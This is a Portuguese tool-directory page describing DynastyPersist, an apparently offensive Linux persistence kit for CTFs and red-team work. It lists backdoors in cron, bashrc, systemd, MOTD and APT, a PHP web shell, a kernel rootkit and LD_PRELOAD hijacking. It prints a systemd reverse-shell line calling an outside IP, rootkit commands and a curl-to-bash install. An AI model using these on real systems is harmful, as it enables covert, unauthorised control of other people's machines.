Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
DynastyPersist — Kit de persistência para Linux com 11 módulos para backdoors de chave SSH, cronjobs, serviços systemd, rootkits LKM e escalonamento de privilégio LD_PRELOAD. Projetado para competições CTF e operações de equipe vermelha. | Kitploit
Ferramentas/GitHubGitHub/trevohack/dynastypersist
Escalada de PrivilégiosMecanismos de PersistênciaPós-ExploraçãoCTFTestes de PenetraçãoRed Teaming
GitHubtrevohack/dynastypersist

DynastyPersist

Kit de persistência para Linux com 11 módulos para backdoors de chave SSH, cronjobs, serviços systemd, rootkits LKM e escalonamento de privilégio LD_PRELOAD. Projetado para competições CTF e operações de equipe vermelha.

Ver Repositório
16221há 11 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DynastyPersist 1.5

DynastyPersist: Uma ferramenta simplificada para alcançar persistência no Linux sem esforço.
Suporta KoTH, Battlegrounds e Operações de Pentest

GitHub License GitHub Repo stars Static Badge

Instalar • Documentação • Uso

image

Documentação

[ RECURSOS ]

RecursosDescrição
Geração de Chaves SSHGera automaticamente chaves SSH para acesso oculto.
Persistência de CronjobConfigura cronjobs para persistência programada.
Usuário Personalizado com RootCria um usuário personalizado com privilégios de root.
Persistência por RCEAlcança persistência através de execução remota de código
LKM/RootkitDemonstra persistência de rootkit baseada em Módulo de Kernel Linux (LKM).
Persistência no BashrcModifica arquivos de inicialização do shell específicos do usuário para persistência (aliases / shells reversos).
Serviço Systemd para RootConfigura um serviço systemd para alcançar persistência de root.
Configuração de Escalonamento de Privilégio LD_PRELOADConfigura LD_PRELOAD para escalonamento de privilégios.
Backdoor na Mensagem do Dia / CabeçalhoColoca backdoor na exibição de mensagens do sistema para acesso oculto.
Modificar um Serviço Systemd ExistenteManipula um serviço systemd existente para persistência.
Backdoor no Comando APTColoca backdoor no comando apt para abrir um shell.

[ Módulos ]

Geração de Chaves SSH

  • Obtenha acesso a um servidor usando a geração de chaves ssh. Este módulo cria uma chave id_rsa para cada usuário, que pode ser usada para acesso reverso. Após executar este módulo, o atacante pode se conectar ao servidor via ssh.

  • Isso pode ser feito manualmente usando o comando ssh-keygen. No entanto, o módulo cria uma chave privada para cada usuário em pouco tempo.

root@kitploit:~
root@kali ~ ssh -i id_rsa [email protected]
  • Número do Módulo: 1

Persistência de Cronjob

  • Cronjobs no Linux são tarefas agendadas que são executadas automaticamente em intervalos especificados.

  • Um dos módulos mais eficientes, que envolve shells reversos. Este módulo escreve diretamente comandos de shell reverso no /etc/crontab, que abrirá um shell na porta em que você está ouvindo.

root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Número do Módulo: 2

Usuário Personalizado com Root

  • Um método simples e rápido para obter acesso reverso. Simplesmente, este módulo cria outro usuário com acesso root. Posteriormente, o atacante pode fazer login no usuário via ssh.
root@kitploit:~
root@kali ~ ssh [email protected]
  • Número do Módulo: 3

Persistência por RCE

  • Este módulo vem com um script php que está hospedado no diretório raiz da web. O script está localizado em /var/www/html/dynasty_rce/rce.php. Além disso, o prefixo dynasty_rce pode ser ocultado se o módulo LKM for executado antes.

  • Visitar victim_ip:port/dynasty_rce/rce.php dará a você o poder de executar comandos dentro do shell.

  • Número do Módulo: 4

Rootkit LKM

  • Um método avançado de persistência, que implanta um rootkit no kernel do servidor. O programa foca em um rootkit LKM de código aberto chamado Diamorphine. O módulo está em /var/tmp/.memory como um local temporário. Este diretório é deletado após a configuração do módulo.

  • O bloco de código abaixo mostra os usos deste módulo.

root@kitploit:~
victim@ubuntu ~ kill -64 0 # Promtes to root user. 
victim@ubuntu ~ mkdir dynasty_persist # Any directory starting with dynasty will be hidden.
victim@ubuntu ~ kill -31 <process> # Hides processors
victim@ubuntu ~ lsmod | grep -i diamorphine # Hides itself 
victim@ubuntu ~ kill -63 0 # Make it appear in lsmod output
  • Número do Módulo: 5

Persistência no Bashrc

  • Este módulo escreve comandos de shell reverso, aliases e variáveis para acesso reverso. Um shell é concedido quando um usuário faz login no servidor ou quando a pessoa usa find ou cat.
root@kitploit:~
root@kali ~ nc -nvlp 9999
  • Número do Módulo: 6

Serviço Systemd para Root

  • Um módulo que cria um serviço personalizado no systemd para acesso reverso.

  • Um exemplo:

root@kitploit:~
Description=Dynasty Persist

[Service]
ExecStart=sudo bash /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/9999 0>&1'
Restart=always
RestartSec=30

[Install]
WantedBy=default.target"
  • O exemplo acima será criado como um serviço. Este método é eficiente e durável.

  • Número do Módulo: 7

Configuração de Escalonamento de Privilégio LD_PRELOAD

  • LD_PRELOAD é uma variável de ambiente no Linux que permite aos usuários pré-carregar uma biblioteca compartilhada antes de outras bibliotecas. O escalonamento de privilégio usando LD_PRELOAD envolve carregar uma biblioteca maliciosa para interceptar e modificar chamadas de sistema, potencialmente ganhando privilégios elevados. O módulo coloca backdoor em comandos como find e wget.

  • Número do Módulo: 8

Backdoor na Mensagem do Dia / Cabeçalho

  • A "Mensagem do Dia" (MOTD) no Linux é um texto personalizável exibido aos usuários no login, fornecendo informações ou atualizações sobre o sistema. Geralmente é armazenada no arquivo /etc/motd e pode ser modificada por administradores do sistema.

  • Este módulo escreve um shell em /etc/update-motd.d/00-header. Isso é normalmente acionado quando um usuário faz login.

  • Número do Módulo: 9

Modificar um Serviço Systemd Existente

  • Similar ao módulo 7, este modifica um serviço existente para acesso reverso.

  • Simplesmente, ele reescreve o ExecStartPre no serviço para um comando de shell reverso.

  • Número do Módulo: 10

Backdoor no APT

  • "APT" significa Advanced Package Tool, e é comumente usado em sistemas baseados em Debian, como Ubuntu. O arquivo será aqui: /etc/apt/apt.conf.d/42backdoor

  • Coloca backdoor no comando apt, sempre que apt é executado, ele abrirá um shell.

  • Número do Módulo: 11

[ MODOS ]

  • Atualmente, existem 2 modos disponíveis na atualização mais recente (1.4).

  • Os modos são console e ctf, projetados para funcionar com um comportamento específico.

  • Em comparação, o modo console vem com mais recursos e estabilidade do que o modo ctf.

Console

  • O modo console inicia a ferramenta na configuração usual, com todos os recursos. Esses recursos serão executados localmente no host local onde o script está sendo executado. Projetado para persistência em operações em tempo real.

  • O prefixo use seguido pelo número do módulo será usado para executar qualquer módulo selecionado. Exemplo: use 1

  • Além disso, a interface foi atualizada; os módulos/payloads agora estão visíveis quando você digita show payloads.

  • Por último, o menu de ajuda/opções também foi modificado; digite show options para visualizá-lo.

CTF

  • O modo ctf é um recurso extra para fazer login em um servidor comprometido via SSH e obter persistência. Este complemento ajudará muito em KoTH ou Battlegrounds. Além disso, economizará muito tempo gasto na configuração da persistência.

  • Executa a maioria das funções do console.

[ USO ]

  • A sintaxe para usar a ferramenta é descrita abaixo:
root@kitploit:~
$ ./dynasty.sh <lhost> <lport> <mode> 
$ ./dynasty.sh ctf 
$ ./dynasty.sh 10.10.14.3 9999 console 

Instalação

Via Git

root@kitploit:~
$ git clone https://github.com/Trevohack/DynastyPersist
$ cd DynastyPersist/src 

Via Curl

root@kitploit:~
$ curl -sSL https://raw.githubusercontent.com/Trevohack/DynastyPersist/main/src/dynasty.sh | bash

Obrigado!

Baixar ferramenta